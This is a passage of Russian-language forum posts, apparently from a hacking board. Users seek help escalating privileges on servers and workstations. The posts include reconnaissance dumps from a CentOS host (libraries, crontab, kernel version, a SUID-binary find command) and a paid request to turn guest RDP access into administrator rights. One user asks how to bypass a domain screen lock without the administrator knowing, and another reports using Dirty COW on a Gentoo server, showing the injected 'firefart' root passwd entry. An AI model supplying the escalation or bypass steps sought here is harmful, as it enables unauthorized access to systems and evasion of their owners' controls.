libnss_nis-2.12.so lrwxrwxrwx 1 root root 18 2016-08-31 16:19:31.157973526 +0300 libnss_nis.so.2 -> libnss_nis-2.12.so -rwxr-xr-x 1 root root 61712 2016-05-10 17:11:19.000000000 +0300 libnss_nisplus-2.12.so lrwxrwxrwx 1 root root 22 2016-08-31 16:19:31.160973475 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so lrwxrwxrwx 1 root root 16 2016-08-31 16:19:38.547849269 +0300 libpam.so.0 -> libpam.so.0.82.2 -rwxr-xr-x 1 root root 55848 2016-05-11 02:18:24.000000000 +0300 libpam.so.0.82.2 lrwxrwxrwx 1 root root 21 2016-08-31 16:19:38.550849219 +0300 libpam_misc.so.0 -> libpam_misc.so.0.82.0 -rwxr-xr-x 1 root root 14584 2016-05-11 02:18:24.000000000 +0300 libpam_misc.so.0.82.0 lrwxrwxrwx 1 root root 17 2016-08-31 16:19:38.551849202 +0300 libpamc.so.0 -> libpamc.so.0.82.1 -rwxr-xr-x 1 root root 14528 2016-05-11 02:18:24.000000000 +0300 libpamc.so.0.82.1 lrwxrwxrwx 1 root root 16 2014-12-01 11:49:42.902000000 +0300 libpci.so.3 -> libpci.so.3.1.10 -rwxr-xr-x 1 root root 48992 2014-08-05 15:06:35.000000000 +0400 libpci.so.3.1.10 lrwxrwxrwx 1 root root 16 2015-09-24 13:39:21.021000000 +0300 libpcre.so.0 -> libpcre.so.0.0.1 -rwxr-xr-x 1 root root 183080 2015-07-24 01:46:06.000000000 +0300 libpcre.so.0.0.1 -rwxr-xr-x 1 root root 18720 2016-05-11 10:14:23.000000000 +0300 libplc4.so -rwxr-xr-x 1 root root 14560 2016-05-11 10:14:23.000000000 +0300 libplds4.so lrwxrwxrwx 1 root root 27 2014-12-01 11:49:46.318000000 +0300 libply-splash-core.so.2 -> libply-splash-core.so.2.0.0 -rwxr-xr-x 1 root root 70360 2014-08-11 21:59:59.000000000 +0400 libply-splash-core.so.2.0.0 lrwxrwxrwx 1 root root 15 2014-12-01 11:49:46.324000000 +0300 libply.so.2 -> libply.so.2.0.0 -rwxr-xr-x 1 root root 89776 2014-08-11 21:59:59.000000000 +0400 libply.so.2.0.0 lrwxrwxrwx. 1 root root 16 2012-09-28 12:27:28.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0 -rwxr-xr-x. 1 root root 36360 2010-08-21 09:30:58.000000000 +0400 libpopt.so.0.0.0 -rwxr-xr-x 1 root root 63200 2016-05-11 02:23:09.000000000 +0300 libproc-3.2.8.so -rwxr-xr-x 1 root root 142688 2016-05-10 17:11:21.000000000 +0300 libpthread-2.12.so lrwxrwxrwx 1 root root 18 2016-08-31 16:19:31.168973340 +0300 libpthread.so.0 -> libpthread-2.12.so lrwxrwxrwx. 1 root root 18 2012-09-28 12:27:30.000000000 +0400 libreadline.so.6 -> libreadline.so.6.0 -rwxr-xr-x. 1 root root 269592 2012-06-22 10:54:32.000000000 +0400 libreadline.so.6.0 -rwxr-xr-x 1 root root 110960 2016-05-10 17:11:20.000000000 +0300 libresolv-2.12.so lrwxrwxrwx 1 root root 17 2016-08-31 16:19:31.174973240 +0300 libresolv.so.2 -> libresolv-2.12.so -rwxr-xr-x 1 root root 43944 2016-05-10 17:11:20.000000000 +0300 librt-2.12.so lrwxrwxrwx 1 root root 13 2016-08-31 16:19:31.177973189 +0300 librt.so.1 -> librt-2.12.so -rwxr-xr-x 1 root root 122056 2016-05-11 01:59:51.000000000 +0300 libselinux.so.1 -rwxr-xr-x 1 root root 201952 2015-07-24 04:38:39.000000000 +0300 libsemanage.so.1 -rwxr-xr-x. 1 root root 248680 2011-12-07 22:01:08.000000000 +0400 libsepol.so.1 lrwxrwxrwx 1 root root 12 2015-09-24 13:40:25.790000000 +0300 libss.so.2 -> libss.so.2.0 -rwxr-xr-x 1 root root 27120 2015-07-24 13:33:24.000000000 +0300 libss.so.2.0 -rwxr-xr-x 1 root root 34008 2016-05-10 17:11:21.000000000 +0300 libthread_db-1.0.so lrwxrwxrwx 1 root root 19 2016-08-31 16:19:31.179973155 +0300 libthread_db.so.1 -> libthread_db-1.0.so lrwxrwxrwx 1 root root 15 2015-09-24 13:39:11.316000000 +0300 libtinfo.so.5 -> libtinfo.so.5.7 -rwxr-xr-x 1 root root 132408 2015-03-16 11:54:00.000000000 +0300 libtinfo.so.5.7 lrwxrwxrwx 1 root root 16 2016-09-14 15:20:18.893921298 +0300 libudev.so.0 -> libudev.so.0.5.1 -rwxr-xr-x 1 root root 55184 2016-09-06 17:51:59.000000000 +0300 libudev.so.0.5.1 -rwxr-xr-x 1 root root 14584 2016-05-10 17:11:19.000000000 +0300 libutil-2.12.so lrwxrwxrwx 1 root root 15 2016-08-31 16:19:31.181973122 +0300 libutil.so.1 -> libutil-2.12.so lrwxrwxrwx 1 root root 16 2017-01-20 13:26:13.933986532 +0300 libuuid.so.1 -> libuuid.so.1.3.0 -rwxr-xr-x 1 root root 16304 2016-11-18 18:38:31.000000000 +0300 libuuid.so.1.3.0 lrwxrwxrwx 1 root root 16 2016-08-31 16:19:36.694880424 +0300 libwrap.so.0 -> libwrap.so.0.7.6 -rwxr-xr-x 1 root root 40792 2016-05-11 02:02:55.000000000 +0300 libwrap.so.0.7.6 lrwxrwxrwx 1 root root 36 2015-09-24 13:44:32.109000000 +0300 libxtables.so.4 -> /etc/alternatives/libxtables4.x86_64 lrwxrwxrwx 1 root root 25 2015-09-24 13:40:38.572000000 +0300 libxtables.so.4-1.4.7 -> libxtables.so.4.0.0-1.4.7 lrwxrwxrwx 1 root root 38 2015-09-24 13:44:32.109000000 +0300 libxtables.so.4.0.0 -> /etc/alternatives/libxtables400.x86_64 -rwxr-xr-x 1 root root 32208 2015-07-24 05:10:22.000000000 +0300 libxtables.so.4.0.0-1.4.7 lrwxrwxrwx 1 root root 13 2014-04-09 11:15:32.000000000 +0400 libz.so.1 -> libz.so.1.2.3 -rwxr-xr-x 1 root root 88600 2013-02-22 03:02:16.000000000 +0400 libz.so.1.2.3 drwxr-xr-x. 2 root root 4096 2015-06-09 15:16:03.062000000 +0300 rsyslog drwxr-xr-x. 2 root root 4096 2016-08-31 16:19:31.184973071 +0300 rtkaio drwxr-xr-x. 3 root root 4096 2016-08-31 16:19:39.936825917 +0300 security dr-xr-xr-x. 2 root root 4096 2011-09-23 15:50:20.000000000 +0400 tls drwxr-xr-x. 2 root root 4096 2015-09-24 13:41:59.052000000 +0300 xtables mount Code: /dev/vda1 on / type ext4 (rw,noatime,usrquota,grpquota) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) df -h Code: Filesystem Size Used Avail Use% Mounted on /dev/vda1 40G 16G 22G 43% / tmpfs 2.0G 0 2.0G 0% /dev/shm cat /etc/issue Code: CentOS release 6.8 (Final) Kernel \r on an \m cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий. Code: cat /etc/crontab 2>&1 SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed cron.d: total 24 drwxr-xr-x 2 root root 4096 Jan 14 23:47 . drwxr-xr-x. 90 root root 4096 Apr 25 12:15 .. -rw-r--r-- 1 root root 113 Aug 23 2016 0hourly -rw------- 1 root root 235 May 11 2016 sysstat -rw-r--r-- 1 root root 51 Jan 14 23:47 trim -rw-r--r-- 1 root root 187 Feb 9 2015 unbound-anchor cat 0hourly sysstat trim unbound-anchor SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ 01 * * * * root run-parts /etc/cron.hourly cat: sysstat: Permission denied 12 0 * * * root /usr/sbin/fstrim / > /dev/null 2>&1# Look to see if the DNSSEC Root key got rolled, if so check trust and update 10 3 1 * * unbound /usr/sbin/unbound-anchor -a /var/lib/unbound/root.anchor -c /etc/unbound/icannbundle.pem cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Aug 31 2016 . drwxr-xr-x. 90 root root 4096 Apr 25 12:15 .. -rwxr-xr-x 1 root root 409 Aug 23 2016 0anacron cat 0anacron #!/bin/bash # Skip excecution unless the date has changed from the previous run if test -r /var/spool/anacron/cron.daily; then day=`cat /var/spool/anacron/cron.daily` fi if [ `date +%Y%m%d` = "$day" ]; then exit 0; fi # Skip excecution unless AC powered if test -x /usr/bin/on_ac_power; then /usr/bin/on_ac_power &> /dev/null if test $? -eq 1; then exit 0 fi fi /usr/sbin/anacron -s cat /proc/version Code: Linux version 3.10.63-1.el6.elrepo.x86_64 (mockbuild@Build64R6) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-11) (GCC) ) #1 SMP Tue Dec 16 16:52:21 EST 2014 cat /proc/sys/vm/mmap_min_addr Code: 4096 find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null Code: -rwsr-xr-x 1 root root 38264 May 10 2016 /bin/ping -rwsr-xr-x 1 root root 53472 Nov 18 2016 /bin/umount -rwsr-xr-x 1 root root 77336 Nov 18 2016 /bin/mount -rwsr-xr-x 1 root root 36488 May 10 2016 /bin/ping6 -rwsr-xr-x 1 root root 34904 May 11 2016 /bin/su -rwsr-x--- 1 root dbus 46232 Apr 22 2015 /lib64/dbus-1/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 22544 Mar 17 2015 /usr/bin/pkexec -rws--x--x 1 root root 20056 Nov 18 2016 /usr/bin/chsh ---s--x--x 1 root root 123832 Dec 7 2016 /usr/bin/sudo -rwsr-xr-x 1 root root 70480 May 11 2016 /usr/bin/chage -rws--x--x 1 root root 20184 Nov 18 2016 /usr/bin/chfn -rwsr-xr-x 1 root root 51784 Aug 23 2016 /usr/bin/crontab -rwsr-xr-x 1 root root 30768 Nov 23 2015 /usr/bin/passwd -rwsr-xr-x 1 root root 75640 May 11 2016 /usr/bin/gpasswd -rwsr-xr-x 1 root root 40240 May 11 2016 /usr/bin/newgrp -rws--x--x 1 root root 14280 May 10 2016 /usr/libexec/pt_chown -rws--x--x 1 vcsa root 7352 May 11 2016 /usr/libexec/mc/cons.saver -rwsr-xr-x 1 root root 14368 Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 257824 May 12 2016 /usr/libexec/openssh/ssh-keysign -rwsr-xr-x 1 root root 9000 Jul 12 2016 /usr/sbin/usernetctl -r-s--x--- 1 root apache 13984 Jan 12 20:10 /usr/sbin/suexec -rwsr-xr-x 1 root root 1228104 Jun 9 2016 /usr/sbin/exim -rwsr-xr-x 1 root root 34840 May 11 2016 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 10272 May 11 2016 /sbin/pam_timestamp_check Остольное Permission denied
Помогите (за вознаграждение) получить по RDP права администратора (или повысить привилегии). Имеется доступ к учетной записи гостя. https://i.snag.gy/g8OybK.jpg https://i.snag.gy/H8mCXA.jpg
Привет.. Может кто поможет советом Windows7 рабочий. Доменный. Права так понимаю с AD.. Компьютер блокируется через 20 минут бездействия (даже если в электропитании выключен сон и отключение монитора) В меню "Запрос пароля при пробуждении" выбрать "Не запрашивать пароль" не представляется возможным, т.к. имеются ограничения прав на данную настройку. Как бы так полулегально сделать, в тайне от администратора, чтобы комп работал и не приходилось каждый раз вводить пароль. Как сделать, чтобы комп не блокировался?
Пацаны, помогите с Gentoo linux uname -a Linux ul9 2.6.35.7-c-s-m-1gb-ua #6 SMP Thu Jul 2 17:46:10 EEST 2015 x86_64 Intel(R) Xeon(R) CPU X5650 @ 2.67GHz GenuineIntel GNU/Linux сработал dirty cow но почему-то не могу подключится со своим паролем через ssh а так же там отсутствует su что делать? ./dc qwertyuio123 sh: [22961: 3 (259)] tcsetattr: Invalid argument при этом firefart:fizS6CvT/B75g:0:0wned:/root:/bin/bash однако через ssh не подключается
